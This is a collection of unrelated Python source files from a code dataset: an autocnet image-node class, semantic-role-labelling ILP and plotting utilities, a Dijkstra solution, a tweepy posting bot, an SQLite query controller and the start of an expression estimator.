io_keypoints.create_output_path(self.geodata.file_name)\n # Create the keypoints entry\n kps = Keypoints(path=kpspath, nkeypoints=0)\n else:\n kps = None\n\n try:\n fp, cam_type = self.footprint\n except Exception as e:\n warnings.warn('Unable to generate image footprint.\\n{}'.format(e))\n fp = cam_type = None\n # Create the image\n i = Images(name=self['image_name'],\n path=self['image_path'],\n geom=fp,\n keypoints=kps,\n #cameras=cam,\n serial=self.isis_serial,\n cam_type=cam_type)\n\n with self.parent.session_scope() as session:\n session.add(i)\n\n def _from_db(self, table_obj, key='image_id'):\n \"\"\"\n Generic database query to pull the row associated with this node\n from an arbitrary table. We assume that the row id matches the node_id.\n\n Parameters\n ----------\n table_obj : object\n The declared table class (from db.model)\n\n key : str\n The name of the column to compare this object's node_id with. For\n most tables this will be the default, 'image_id' because 'image_id'\n is the foreign key in the DB. For the Images table (the parent table),\n the key is simply 'id'.\n \"\"\"\n if 'node_id' not in self.keys():\n return\n with self.parent.session_scope() as session:\n res = session.query(table_obj).filter(getattr(table_obj,key) == self['node_id']).first()\n session.expunge_all()\n return res\n\n @property\n def parent(self):\n return getattr(self, '_parent', None)\n\n @parent.setter\n def parent(self, parent):\n self._parent = parent\n\n @property\n def keypoint_file(self):\n res = self._from_db(Keypoints)\n if res is None:\n return\n return res.path\n\n @property\n def keypoints(self):\n try:\n return io_keypoints.from_hdf(self.keypoint_file, descriptors=False)\n except:\n return pd.DataFrame()\n\n @keypoints.setter\n def keypoints(self, kps):\n session = Session()\n io_keypoints.to_hdf(self.keypoint_file, keypoints=kps)\n\n\n res = self._from_db(Keypoints)\n with self.parent.session_scope() as session:\n res.nkeypoints = len(kps)\n\n @property\n def descriptors(self):\n try:\n return io_keypoints.from_hdf(self.keypoint_file, keypoints=False)\n except:\n return\n\n @descriptors.setter\n def descriptors(self, desc):\n if isinstance(desc, np.array):\n io_keypoints.to_hdf(self.keypoint_file, descriptors=desc)\n\n @property\n def nkeypoints(self):\n \"\"\"\n Get the number of keypoints from the database\n \"\"\"\n res = self._from_db(Keypoints)\n return res.nkeypoints if res is not None else 0\n\n def create_camera(self, url):\n \"\"\"\n Creates a CSM sensor for the node and serializes the state\n to the DB,\n\n Parameters\n ----------\n url : str\n The URI to a service that can create an ISD to instantiate\n a sensor.\n \"\"\"\n raise NotImplementedError\n\n # TODO: This should pass the straight metadata and not mess with mundging it.\n label = pvl.dumps(self.geodata.metadata).decode()\n response = requests.post(url, json={'label':label})\n response = response.json()\n model_name = response.get('name_model', None)\n if model_name is None:\n return\n isdpath = os.path.splitext(self['image_path'])[0] + '.json'\n try:\n with open(isdpath, 'w') as f:\n json.dump(response, f)\n except Exception as e:\n warnings.warn('Failed to write JSON ISD for image {}.\\n{}'.format(self['image_path'], e))\n isd = csmapi.Isd(self['image_path'])\n plugin = csmapi.Plugin.findPlugin('UsgsAstroPluginCSM')\n self._camera = plugin.constructModelFromISD(isd, model_name)\n serialized_camera = self._camera.getModelState()\n\n cam = Cameras(camera=serialized_camera, image_id=self['node_id'])\n return cam\n\n @property\n def camera(self):\n \"\"\"\n Get the camera object from the database.\n \"\"\"\n # TODO: This should use knoten once it is stable.\n import csmapi\n if not getattr(self, '_camera', None):\n res = self._from_db(Cameras)\n plugin = csmapi.Plugin.findPlugin('UsgsAstroPluginCSM')\n if res is not None:\n self._camera = plugin.constructModelFromState(res.camera)\n return self._camera\n\n @property\n def footprint(self):\n with self.parent.session_scope() as session:\n res = session.query(Images).filter(Images.id == self['node_id']).first()\n\n # not in database, create footprint\n if res is None:\n # get ISIS footprint if possible\n if utils.find_in_dict(self.geodata.metadata, \"Polygon\"):\n footprint_latlon = shapely.wkt.loads(self.geodata.footprint.ExportToWkt())\n if isinstance(footprint_latlon, shapely.geometry.Polygon):\n footprint_latlon = shapely.geometry.MultiPolygon(list(footprint_latlon))\n cam_type = 'isis'\n return footprint_latlon, cam_type\n # Get CSM footprint\n else:\n boundary = generate_boundary(self.geodata.raster_size[::-1]) # yx to xy\n footprint_latlon = generate_latlon_footprint(self.camera,\n boundary,\n dem=parent.dem)\n footprint_latlon.FlattenTo2D()\n cam_type = 'csm'\n return footprint_latlon, cam_type\n else:\n # in database, return footprint\n footprint_latlon = res.footprint_latlon\n return footprint_latlon\n\n @property\n def points(self):\n with self.parent.session_scope() as session:\n pids = session.query(Measures.pointid).filter(Measures.imageid == self['node_id']).all()\n res = session.query(Points).filter(Points.id.in_(pids)).all()\n return res\n\n @property\n def measures(self):\n with self.parent.session_scope() as session:\n res = session.query(Measures).filter(Measures.imageid == self['node_id']).all()\n return res\n\n @property\n def ignore(self):\n \"\"\"\n Gets the ignore flag from the Images table\n \"\"\"\n res = self._from_db(Images, key='id')\n return res.ignore\n\n @ignore.setter\n def ignore(self, ignore):\n \"\"\"\n Sets the ignore flag in the Images table\n \"\"\"\n with self.parent.session_scope() as session:\n res = session.query(Images).filter(getattr(Images,'id') == self['node_id']).one()\n res.ignore = ignore\n\n","sub_path":"autocnet/graph/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":23452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"263050776","text":"import os\nimport json\nimport numpy as np\nimport operator\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport subprocess\nimport warnings\n\n\nfrom collections import defaultdict\nfrom os.path import join\nimport entailment\nimport ilp_config\n\n__author__ = 'chetannaik'\n\n# Force matplotlib to not use any Xwindows backend (to run without error on ambiguity)\nmatplotlib.use('Agg')\nilp_config.set_plot_config()\n\n\ndef load_srl_data(srl_file):\n \"\"\"Read the srl json, parse it into a python dictionary and return.\"\"\"\n d = json.load(open(srl_file, \"r\"))\n data = {}\n for p_data in d:\n process = p_data['process']\n ss_data = p_data['sentences']\n sent_to_id = {}\n id_to_args = {}\n sentences={}\n arg_role_scores = {}\n arg_role_srl_data = {}\n for s_data in ss_data:\n sentence = s_data['text']\n s_id = s_data['sentenceId']\n sent_to_id[sentence] = s_id\n sentences[s_id]=sentence\n a_spans = s_data['predictionArgumentSpan']\n args = []\n if len(a_spans) != 0:\n for a_span in a_spans:\n srl_role_prediction = a_span['rolePredicted']\n start_idx = a_span['startIdx']\n end_idx = a_span['endIdx']\n arg_text = a_span['text']\n arg_id = a_span['argId']\n role_prob_list = a_span['probRoles']\n args.append((arg_id, arg_text))\n role_probs = {}\n for role_prob in role_prob_list:\n role_probs.update(role_prob)\n arg_role_scores[(s_id, arg_id)] = role_probs\n arg_role_srl_data[(s_id, arg_id)] = [srl_role_prediction, start_idx, end_idx]\n id_to_args[s_id] = args\n if len(arg_role_scores.keys()) != 0:\n data[process] = [sent_to_id, id_to_args, arg_role_scores, arg_role_srl_data,sentences]\n return data\n\n\ndef dump_ilp_json(data, ilp_data, ilp_scores, ilp_out_path):\n \"\"\"Dump json file using the dictionary created from ilp data\"\"\"\n j_dump_data = []\n for process in data.keys():\n # list of sentences\n sent_list = []\n sent_to_id, id_to_args, arg_role_scores, arg_role_srl_data = data[process]\n ilp_score = ilp_scores[process]\n for sentence_text, s_id in sent_to_id.iteritems():\n # list of args\n arg_list = []\n for arg_id, arg_text in id_to_args[s_id]:\n srl_role_prediction, start_idx, end_idx = arg_role_srl_data[(s_id, arg_id)]\n # list of probs\n role_probs = map(lambda x: dict([x]), ilp_score[(s_id, arg_id)].items())\n ilp_r_vals = ilp_data[process][s_id][arg_id]\n ilp_i_vals = {v: k for k, v in ilp_r_vals.items()}\n if 1 in ilp_i_vals:\n ilp_role = ilp_config.roles[ilp_i_vals[1]]\n else:\n ilp_role = \"NONE\"\n arg_list.append({'argId': arg_id,\n 'text': arg_text,\n 'rolePredicted': ilp_role,\n 'startIdx': start_idx,\n 'endIdx': end_idx,\n 'probRoles': role_probs})\n sent_list.append({'sentenceId': s_id,\n 'text': sentence_text,\n 'predictionArgumentSpan': arg_list})\n j_dump_data.append({'process': process,\n 'sentences': sent_list})\n with open(ilp_out_path, 'w') as fp:\n json.dump(j_dump_data, fp, indent=4)\n\n\n# Some useful utilities\ndef get_sentences(p_data):\n sent_to_id, id_to_args, arg_role_scores = p_data\n return [(v, k) for k, v in sent_to_id.iteritems()]\n\n\ndef get_sentence_args(sentence, p_data):\n sent_to_id, id_to_args, arg_role_scores = p_data\n s_id = sent_to_id[sentence]\n return id_to_args[s_id]\n\n\ndef get_role_scores(sentence, arg_id, role, p_data):\n sent_to_id, id_to_args, arg_role_scores = p_data\n s_id = sent_to_id[sentence]\n return arg_role_scores[s_id, arg_id][role]\n\n\ndef get_role_score_dict(p_data):\n sentences = get_sentences(p_data)\n roles = ilp_config.roles\n role_score_vars = {}\n for s_id, sentence in sentences:\n args = get_sentence_args(sentence, p_data)\n for a_id, arg in args:\n for r_id, role in enumerate(roles):\n role_score = get_role_scores(sentence, a_id, role, p_data)\n role_score_vars[s_id, a_id, r_id] = role_score\n return role_score_vars\n\n\ndef get_similarity_score(arg1, arg2):\n \"\"\"\"Call entailment function by passing args in both directions and return\n the best score.\"\"\"\n ret = entailment.get_ai2_textual_entailment(arg1, arg2)\n a_scores = map(lambda x: x['score'], ret['alignments'])\n if len(a_scores):\n mean_a_score = np.mean(a_scores)\n else:\n mean_a_score = 0\n\n confidence = ret['confidence'] if ret['confidence'] else 0\n score1 = mean_a_score * confidence\n\n ret = entailment.get_ai2_textual_entailment(arg2, arg1)\n a_scores = map(lambda x: x['score'], ret['alignments'])\n if len(a_scores):\n mean_a_score = np.mean(a_scores)\n else:\n mean_a_score = 0\n\n confidence = ret['confidence'] if ret['confidence'] else 0\n score2 = mean_a_score * confidence\n return float(max(score1, score2))\n\n\ndef get_ilp_assignment_from_file(process):\n f = open(join(ilp_config.project_dir,'output', process+'_ilp.sol'))\n lines = f.readlines()\n data = filter(lambda x: x.startswith('Z'), lines)\n data = map(lambda x: x[:-1], data)\n\n output_map = defaultdict(lambda: defaultdict(lambda: defaultdict(float)))\n for d in data:\n var, ind = d.split(\" \")\n var_ids = var.split(\"_\")\n s = int(var_ids[1])\n a = int(var_ids[2])\n r = int(var_ids[3])\n output_map[s][a][r] = int(ind)\n return output_map\n\n\ndef get_ilp_scores(process, srl_data, sim_data):\n \"\"\"Use ILP assignments, insert it back into objective function and calculate\n the ILP score for a given assignement.\"\"\"\n _, id_to_args, _, _ = srl_data[process]\n\n output_map = get_ilp_assignment_from_file(process)\n role_score_vals = get_role_score_dict(srl_data[process][:3])\n\n ilp_scores = defaultdict(lambda: defaultdict(float))\n\n for s_1, val_1 in output_map.iteritems():\n args_1 = id_to_args[s_1]\n for a_1, aval_1 in val_1.iteritems():\n arg_1 = dict(args_1)[a_1]\n for r, rv_1 in aval_1.iteritems():\n tmp = 0\n for s_2, val_2 in output_map.iteritems():\n if s_1 != s_2:\n args_2 = id_to_args[s_2]\n for a_2, aval_2 in val_2.iteritems():\n arg_2 = dict(args_2)[a_2]\n rv_2 = aval_2[r]\n tmp += rv_2 * sim_data[(arg_1, arg_2)]\n ilp_scores[s_1, a_1][ilp_config.roles[r]] = (float(role_score_vals[s_1, a_1, r]) * ilp_config.lambda_1) + (ilp_config.lambda_2 * tmp)\n return ilp_scores\n\n\ndef normalize_ilp_scores(ilp_scores):\n \"\"\"Normalize the ilp scores.\"\"\"\n norm_ilp_scores = {}\n for s_a_id, a_data in ilp_scores.iteritems():\n denom = sum(a_data.values())\n norm_vals = dict(map(lambda x: (x[0], x[1]/denom), a_data.items()))\n norm_ilp_scores[s_a_id]= norm_vals\n return norm_ilp_scores\n\n\ndef get_gold_data(d_gold):\n \"\"\"Parse the gold data into python dictionary.\"\"\"\n gold_data_raw = defaultdict(list)\n for process_dict in d_gold:\n process = process_dict['process']\n # list of sentences\n for sentence_dict in process_dict['sentences']:\n sent_id = sentence_dict['sentenceId']\n # list of arguments\n for arg_dict in sentence_dict['annotatedArgumentSpan']:\n start_id = int(arg_dict['startIdx'])\n end_id = int(arg_dict['endIdx'])\n role_type = arg_dict['annotatedRole']\n role_label = int(arg_dict['annotatedLabel'])\n argument=arg_dict['text']\n gold_data_raw[(sent_id,argument, start_id, end_id,process)].append((role_type, role_label))\n #print \"PROCESS DICT\",process_dict\n #print \"SENTENCE DICT\",sentence_dict\n #print \"RAW\",gold_data_raw\n \n\n gold_data = {}\n for k, v in gold_data_raw.iteritems():\n roles = []\n labels = []\n argument=[]\n for x in v:\n roles.append(x[0])\n labels.append(x[1])\n #argument.append(x[2])\n # if any role name has 1 as its value, set that (the first one) as the\n # gold role.\n if 1 in labels:\n gold_data[k] = roles[labels.index(1)]\n # if none of the roles have 1 value (but instead have -1), the set the\n # role of such argument span as 'NONE'\n elif np.sum(labels) == -4:\n gold_data[k] = 'NONE'\n return gold_data\n\n\ndef get_prediction_data(d_predict):\n \"\"\"Parse the prediction data into python dictionary.\"\"\"\n srl_data = defaultdict()\n for process_dict in d_predict:\n process = process_dict['process']\n # list of sentences\n for sentence_dict in process_dict['sentences']:\n sent_id = sentence_dict['sentenceId']\n # list of arguments\n for arg_dict in sentence_dict['predictionArgumentSpan']:\n start_id = int(arg_dict['startIdx'])\n end_id = int(arg_dict['endIdx'])\n role_predicted = arg_dict['rolePredicted']\n # create a dictionary with role label as key and predction score\n # of the role as value\n role_probs = {}\n for role_prob in arg_dict['probRoles']:\n role_probs.update(role_prob)\n srl_data[(sent_id, start_id, end_id)] = (role_predicted, role_probs[role_predicted])\n return srl_data\n\n\ndef plot_precision_yield(plot_data, name='prec_recall', role=None):\n srl_plot_df, ilp_plot_df, semafor_plot_df, easysrl_plot_df = plot_data\n srl_plot_df = srl_plot_df.iloc[10:]\n ilp_plot_df = ilp_plot_df.iloc[10:]\n semafor_plot_df = semafor_plot_df.iloc[10:]\n easysrl_plot_df = easysrl_plot_df.iloc[10:]\n\n # plot size\n plt.rc('figure', figsize=(18,12))\n\n # plot lines\n plt.plot(srl_plot_df.index, srl_plot_df.precision, label=r'\\textbf{SRL}', linewidth=3)\n plt.plot(ilp_plot_df.index, ilp_plot_df.precision, 'r--',label=r'\\textbf{ILP}', linewidth=3)\n plt.plot(semafor_plot_df.index, semafor_plot_df.precision, 'g--',label=r'\\textbf{SEMAFOR}', linewidth=3)\n plt.plot(easysrl_plot_df.index, easysrl_plot_df.precision, 'm--',label=r'\\textbf{EasySRL}', linewidth=3)\n\n # configure plot\n plt.tick_params(axis='both', which='major', labelsize=50)\n plt.xlabel(r'\\textbf{Recall}', fontsize=50)\n plt.ylabel(r'\\textbf{Precison}', fontsize=50)\n plt.xlim([0, 1])\n plt.ylim([0, 1.005])\n plt.legend(loc='lower right', handlelength=3, prop={'size':45}) #borderpad=1.5, labelspacing=1.5,\n plt.tight_layout()\n\n # save plot\n if role:\n f_name = join(ilp_config.plots_dir, str(role) + \"_\" + str(name) + \".pdf\")\n else:\n f_name = join(ilp_config.plots_dir, str(name) + \".pdf\")\n plt.savefig(f_name)\n plt.close()\n\n\ndef plot_precision_yield_axes(plot_data, ax, fold, role=None):\n srl_plot_df, ilp_plot_df, semafor_plot_df, easysrl_plot_df = plot_data\n srl_plot_df = srl_plot_df.iloc[5:]\n ilp_plot_df = ilp_plot_df.iloc[5:]\n semafor_plot_df = semafor_plot_df.iloc[5:]\n easysrl_plot_df = easysrl_plot_df.iloc[5:]\n\n # plot size\n plt.rc('figure', figsize=(18,14))\n\n # plot lines\n ax.plot(srl_plot_df.index, srl_plot_df.precision, label=r'\\textbf{SRL}', linewidth=3)\n ax.plot(ilp_plot_df.index, ilp_plot_df.precision, 'r--',label=r'\\textbf{ILP}', linewidth=3)\n ax.plot(semafor_plot_df.index, semafor_plot_df.precision, 'g--',label=r'\\textbf{SEMAFOR}', linewidth=3)\n ax.plot(easysrl_plot_df.index, easysrl_plot_df.precision, 'm--',label=r'\\textbf{EasySRL}', linewidth=3)\n\n # configure plot\n ax.tick_params(axis='both', which='major', labelsize=24)\n ax.set_xlabel(r'\\textbf{Recall}', fontsize=28)\n ax.set_ylabel(r'\\textbf{Precison}', fontsize=28)\n ax.set_xlim([0, 1])\n ax.set_ylim([0, 1.005])\n if role:\n ax.set_title(str(role).title() + ' Fold ' + str(fold), fontsize=20)\n else:\n ax.set_title('Fold ' + str(fold), fontsize=20)\n ax.legend(loc='lower right', handlelength=3, prop={'size':15}) #borderpad=1.5, labelspacing=1.5,\n plt.tight_layout()\n\n\ndef plot_role_plot(data, name='prec_recall_folds', role=None):\n srl_plot_data, ilp_plot_data, semafor_plot_data, easysrl_plot_data = data\n\n # create 5 subplots for 5 roles in one column\n fig, ((ax1), (ax2), (ax3), (ax4), (ax5)) = plt.subplots(nrows=5, ncols=1, figsize=(10, 40))\n\n # call plot function on each of the 5 subplot axes\n plot_precision_yield_axes((srl_plot_data[1], ilp_plot_data[1], semafor_plot_data[1], easysrl_plot_data[1]), ax1, \"1\", role)\n plot_precision_yield_axes((srl_plot_data[2], ilp_plot_data[2] , semafor_plot_data[2], easysrl_plot_data[2]), ax2, \"2\", role)\n plot_precision_yield_axes((srl_plot_data[3], ilp_plot_data[3] , semafor_plot_data[3], easysrl_plot_data[3]), ax3, \"3\", role)\n plot_precision_yield_axes((srl_plot_data[4], ilp_plot_data[4] , semafor_plot_data[4], easysrl_plot_data[4]), ax4, \"4\", role)\n plot_precision_yield_axes((srl_plot_data[5], ilp_plot_data[5] , semafor_plot_data[5], easysrl_plot_data[5]), ax5, \"5\", role)\n\n # adjust spacing betwen plots\n fig.subplots_adjust(hspace=.3, wspace=-0.2)\n\n # save plot\n if role:\n f_name = join(ilp_config.plots_dir, str(role) + \"_\" + str(name) + \".pdf\")\n else:\n f_name = join(ilp_config.plots_dir, str(name) + \".pdf\")\n fig.savefig(f_name)\n plt.close(fig)\n\n\ndef plot_confusion_matrix(c_matrix, fold=None, filename=None):\n fig, ax = plt.subplots(figsize=(12, 9))\n sns.heatmap(c_matrix, annot=True, fmt='',\n xticklabels=labels, yticklabels=ilp_config.labels,\n linewidths=1, square=True);\n ax.xaxis.set_ticks_position(\"bottom\")\n plt.xlabel('Predicted Label')\n plt.ylabel('True Label')\n plt.xticks(rotation=30)\n plt.yticks(rotation=30)\n if fold:\n plt.title('Fold ' + str(fold) +' Confusion Matrix', fontsize=20);\n else:\n plt.title('Confusion Matrix', fontsize=20);\n if filename:\n f_name = join(ilp_config.plots_dir, str(filename) + \".pdf\")\n plt.savefig(f_name)\n plt.close()\n\n\ndef subplot_confusion_matrix(c_matrix, ax, fold):\n sns.heatmap(c_matrix, annot=True, fmt='',\n xticklabels=ilp_config.labels, yticklabels=ilp_config.labels,\n linewidths=1, square=True, ax=ax, cbar=False);\n ax.xaxis.set_ticks_position(\"bottom\")\n ax.set_xticklabels(ilp_config.labels, rotation=30, fontsize=20)\n ax.set_yticklabels(ilp_config.labels[::-1], rotation=30, fontsize=20)\n ax.set_xlabel('Predicted Label', fontsize=20)\n ax.set_ylabel('True Label', fontsize=20)\n ax.set_title(\"Fold \" + str(fold) + ' Confusion Matrix', fontsize=20);\n\n\ndef plot_confusion_subplots(c_matrices, name=\"confusion_matrix\"):\n fig, ((ax1, ax2), (ax3, ax4), (ax5, ax6)) = plt.subplots(nrows=3, ncols=2, figsize=(20, 20))\n subplot_confusion_matrix(c_matrices[1], ax1, \"1\")\n subplot_confusion_matrix(c_matrices[2], ax2, \"2\")\n subplot_confusion_matrix(c_matrices[3], ax3, \"3\")\n subplot_confusion_matrix(c_matrices[4], ax4, \"4\")\n #subplot_confusion_matrix(c_matrices[5], ax5, \"5\")\n fig.subplots_adjust(hspace=.8, wspace=-0.2)\n ax6.axis('off')\n f_name = join(ilp_config.plots_dir, str(name) + \".pdf\")\n fig.savefig(f_name)\n plt.close(fig)\n\n\ndef generate_tex_table(df, name='accuracy_table'):\n filename = join(ilp_config.plots_dir, str(name) + \".tex\")\n pdffile = join(ilp_config.plots_dir, str(name) + \".pdf\")\n outname = join(ilp_config.plots_dir, str(name) + \".png\")\n\n template = r'''\\documentclass[preview]{{standalone}}\n \\usepackage{{booktabs}}\n \\begin{{document}}\n {}\n \\end{{document}}\n '''\n\n with open(filename, 'wb') as f:\n f.write(template.format(df.to_latex()))\n\n FNULL = open(os.devnull, 'w')\n subprocess.call(['pdflatex', '-output-directory', ilp_config.plots_dir , filename], stdout=FNULL, stderr=subprocess.STDOUT)\n subprocess.call(['convert', '-density', '300', pdffile, '-quality', '90', outname], stdout=FNULL, stderr=subprocess.STDOUT)\n","sub_path":"ilp_utils.py","file_name":"ilp_utils.py","file_ext":"py","file_size_in_byte":16716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"196166021","text":"import sys\nimport heapq\ninput = sys.stdin.readline\nINF = sys.maxsize\n\nN, M = map(int, input().split())\ndistance = [INF for _ in range(N + 1)]\nvisited = [False for _ in range(N + 1)]\ngraph = [[] for _ in range(N + 1)]\nfor _ in range(M):\n node1, node2, dist = map(int, input().split())\n graph[node1].append((dist, node2))\n graph[node2].append((dist, node1))\n\nqueue = []\nheapq.heappush(queue, (0, 1))\ndistance[1] = 0\nvisited[1] = True\nwhile queue:\n dist, now = heapq.heappop(queue)\n if distance[now] < dist:\n continue\n for path in graph[now]:\n if not visited[path[1]] and path[0] + dist < distance[path[1]]:\n distance[path[1]] = path[0] + dist\n heapq.heappush(queue, (distance[path[1]], path[1]))\n visited[now] = True\nprint(distance[-1])\n\n\"\"\"\n풀이\n그냥 다익스트라 알고리즘을 써서 풀었다.\n\n오랜만에 다익스트라 문제를 풀었더니 기억이 안 나서 이론을 다시 봤다.\n그런데도 헷갈려서 숫자 하나씩 틀려서 몇 번 틀렸다.\n\n\"\"\"","sub_path":"season3/season3/week1/minkyu/5972.py","file_name":"5972.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"248206330","text":"#Jonathan Ingram\r\n#12/20/2019\r\n#define differnt types of posts\r\n\r\n\r\n\r\n'''\r\nPLEASE READ:\r\n\r\nThe primary purpose of this file is to define and catagorize\r\ndifferent types of twitter post\r\nNothing will be run directly in this file.\r\n\r\n'''\r\n#External Libraries\r\nimport random\r\nimport time\r\nfrom time import strftime\r\nimport tweepy\r\nimport textblob\r\n\r\nimport openFiles\r\n\r\n#Reading in keys\r\napiKey = openFiles.OpenFiles.openApiKey()\r\napiSecretKey = openFiles.OpenFiles.openApiSecretKey()\r\n\r\naccessToken = openFiles.OpenFiles.openAccessToken()\r\naccessTokenSecret = openFiles.OpenFiles.openAccessTokenSecret()\r\n\r\nauth = tweepy.OAuthHandler(apiKey, apiSecretKey)\r\nauth.set_access_token(accessToken,accessTokenSecret)\r\n\r\napi = tweepy.API(auth)\r\n\r\n\r\n#Posts class\r\nclass Posts:\r\n def __init__(self):\r\n print(\"Instance of posts class within PostTypes.py\")\r\n\r\n def tweetImage():\r\n media = api.media_upload(\"Images/mountain.jfif\")\r\n\r\n post_result = api.update_status(status=\"Chill:\\n\\n\\n\", media_ids=[media.media_id])\r\n\r\n def onePost():\r\n api.update_status(status=\"test\")\r\n\r\n def hourlyPost():\r\n\r\n \r\n def getTime(): #Gets the time and retruns as a string\r\n string = strftime('%H:%M:%S') \r\n print(string)\r\n return string\r\n\r\n hour = 0\r\n checkHour = \":33:30\"\r\n postTime = \"\"\r\n\r\n \r\n while (postTime != \"11:30:30\"): #loop until it's 11:30 pm\r\n timeString = str(getTime())\r\n print(timeString)\r\n time.sleep(1)\r\n\r\n\r\n #Definatly a better way to do this, just got lazy\r\n postTime = timeString[2] + timeString[3] + timeString[4] + timeString[5] + timeString[6] + timeString[7]\r\n\r\n if(postTime == checkHour):\r\n Posts.onePost()\r\n\r\n\r\n''' \r\n#Functions that are TBD to be put into production\r\n def nounVerbNoun():\r\n \r\n\r\n nvn = openFiles.OpenFiles.getNoun() + openFiles.OpenFiles.getVerb() + openFiles.OpenFiles.getNoun()\r\n print(nvn)\r\n #api.update_status(status=nvn)\r\n\r\n def pastTenseNounVerbNoun():\r\n\r\n nPTVn = \"The\\n\" + openFiles.OpenFiles.getNoun() + openFiles.OpenFiles.getPastTenseVerb().lower() + \"the\\n\" + openFiles.OpenFiles.getNoun()\r\n\r\n print(nPTVn)\r\n\r\n def nameVerbNoun():\r\n\r\n nPTVn = openFiles.OpenFiles.getName() + openFiles.OpenFiles.getPastTenseVerb().lower() + \"the\\n\" + openFiles.OpenFiles.getNoun()\r\n\r\n print(nPTVn)\r\n\r\n def newMeme():\r\n\r\n\r\n memeCheck = True\r\n while (memeCheck == True):\r\n\r\n nMeme = openFiles.OpenFiles.getMeme()\r\n print(nMeme)\r\n\r\n memeCheck = True\r\n answer = input(\"Do you like this meme? \")\r\n\r\n if (answer == \"y\"):\r\n print(\"posted\")\r\n api.update_status(status=nMeme)\r\n memeCheck = False\r\n\r\n else:\r\n print(\"not posted\")\r\n'''\r\n\r\n#End of Posts classs","sub_path":"Event_Board/PostTypes.py","file_name":"PostTypes.py","file_ext":"py","file_size_in_byte":2986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"436124314","text":"import sqlite3\nimport sys\nfrom pprint import pprint\n\n# State class\nclass SQLiteController():\n\n DB_LOCATION = '../db/lsl.db'\n\n # DB File\n @property\n def con(self):\n return self.__con\n @con.setter\n def con(self, value):\n self.__con = value\n\n # Cursor object\n @property\n def cursor(self):\n return self.__cursor\n @cursor.setter\n def cursor(self, value):\n self.__cursor = value\n\n dbtype = \"\"\n\n def __init__(self):\n self.dbtype = \"SQLite\"\n co, cr = self.GetConnectCursor()\n\n def GetConnectCursor(self):\n con = self.CheckCreateDB()\n cur = con.cursor()\n return con, cur\n\n # Get Target DB file. If not exit, Create & Get.\n def CheckCreateDB(self):\n relativePath = SQLiteController.DB_LOCATION\n\n # print(\"relativePath\", relativePath)\n\n con = sqlite3.connect(relativePath)\n return con\n\n def Json2Query(self, jsonquery):\n return\n\n def Create(self, q, opt=[]):\n print(self.dbtype, sys._getframe().f_code.co_name, q)\n\n def Read(self, q, opt=[]):\n print(self.dbtype, sys._getframe().f_code.co_name, q)\n # {'collection': 'sticker_detail', 'projection': {'id': 1, 'title': 1}, 'selection': {'id.parent': 1162635},\n # 'sort': {'enable': 1, 'order': 0}}\n # 'SELECT local_id FROM sticker_detail WHERE parent_id=%s ORDER BY local_id' % (parentID)\n\n q_select = \"SELECT\"\n q_from = \"FROM\"\n q_where = \"WHERE\"\n\n q_select += \" \" + q[\"projection\"][0]\n q_from += \" \" + q[\"collection\"]\n\n for dicKey in q[\"selection\"].keys() :\n keyVal = q[\"selection\"][dicKey]\n where_cond = \"(%s = %s)\" % (dicKey, keyVal)\n\n q_where += \" \" + where_cond\n\n q_order = \"\"\n if (q[\"sort\"][\"enable\"]):\n q_order = \"ORDER BY\"\n sort_param = \"ASC\" if q[\"sort\"][\"order\"][\"direction\"] == 1 else \"DESC\"\n q_order += \" \" + q[\"sort\"][\"order\"][\"key\"] + \" \" + sort_param\n\n squery = q_select + \" \" + q_from + \" \" + q_where + \" \" + q_order\n\n print(\"squery =\", squery)\n\n co, cr = self.GetConnectCursor()\n\n cr.execute(squery)\n\n type = \"ABC\"\n if type == 'count':\n dbResult = cr.fetchone()\n dbResult = int(dbResult[0])\n else:\n dbResult = cr.fetchall()\n co.close()\n\n for find in dbResult:\n pprint(find)\n\n def Update(self, q, opt=[]):\n print(self.dbtype, sys._getframe().f_code.co_name, q)\n\n def Delete(self, q, opt=[]):\n print(self.dbtype, sys._getframe().f_code.co_name, q)\n","sub_path":"app/src/SQLiteController.py","file_name":"SQLiteController.py","file_ext":"py","file_size_in_byte":2661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"501071808","text":"import typing as t\nfrom typing import Iterable\nimport unittest\nfrom copy import copy\nfrom collections import namedtuple\nfrom decimal import Decimal\nfrom functools import partial\nfrom itertools import zip_longest\n\nfrom . import estimation_nodes as enodes, nodes, environment, errors, type_checking, environment_entries as entries\nfrom .enums import DeclType\nfrom .utils import submangle, dispatch, NODES, EXPRESSIONS, ASSIGNMENTS, apply_mapping\nfrom .constants import (\n builtin_funcs, private_builtin_funcs, string_fields, vector_fields, dict_fields, SELF_NAME, SPEC_LINE\n)\nfrom .context import Context\n\n\nEstimatedObjects = namedtuple(\n \"EstimatedObjects\", [\n 'builtin_funcs', 'private_builtin_funcs', 'string_fields', 'vector_fields', 'dict_fields'\n ]\n)\nEstimatedFields = t.Dict[str, t.Union[t.Callable[..., enodes.Expression], enodes.Expression]]\n\n\nclass Evaluator(unittest.TestCase):\n def __init__(\n self, estimated_objs: EstimatedObjects, context: Context, env: environment.Environment\n ) -> None:\n super().__init__()\n self.env = env\n self.code = errors.Code()\n self.repl_tmp_count = 0\n self.context = context\n self.type_checker = type_checking.TypeChecker(context, self.env)\n self.type_checker.estimator = self\n\n self.estimated_objs = estimated_objs\n\n self.expression_dispatcher = {\n nodes.Name: self.estimate_name,\n nodes.SpecialName: self.estimate_special_name,\n nodes.Field: self.estimate_field,\n nodes.Subscript: self.estimate_subscript,\n nodes.BinaryExpression: self.estimate_binary_expression,\n nodes.Cast: self.estimate_cast,\n nodes.Ref: self.estimate_ref,\n nodes.Parentheses: lambda expr: self.estimate_expression(expr.value),\n nodes.FunctionCall: self.estimate_function_call,\n nodes.MethodCall: self.estimate_method_call,\n nodes.BuiltinFunc: lambda func: self.estimated_objs.builtin_funcs[func.value],\n nodes.PrivateBuiltinFunc: lambda func: self.estimated_objs.private_builtin_funcs[func.value],\n nodes.Decl: self.estimate_decl,\n nodes.NamedArgument: lambda argument: self.estimate_expression(argument.value),\n\n nodes.OptionalSomeCall: self.estimate_optional_some_call,\n 